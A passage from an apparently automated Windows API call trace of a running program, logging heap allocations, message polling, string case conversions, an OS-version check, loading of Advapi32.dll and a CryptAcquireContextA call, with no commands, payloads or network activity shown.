(HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0176.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0176.668] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0176.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0176.669] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0176.669] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0176.669] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0176.669] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0176.669] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0176.670] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0176.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0176.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0176.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0176.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0176.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0176.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0176.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.671] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.671] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0176.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0176.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.672] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0176.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0176.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0176.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0176.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0176.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.673] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0176.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0176.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0176.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0176.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0176.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0176.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0176.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0176.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0176.674] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.674] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.674] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0176.674] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.674] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0176.674] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0176.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0176.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0176.678] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c2a8) returned 1 [0176.708] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.709] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0176.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.709] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0176.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.709] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0176.709] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.710] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0176.710] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.710] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.710] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.710] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.711] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.711] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.712] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 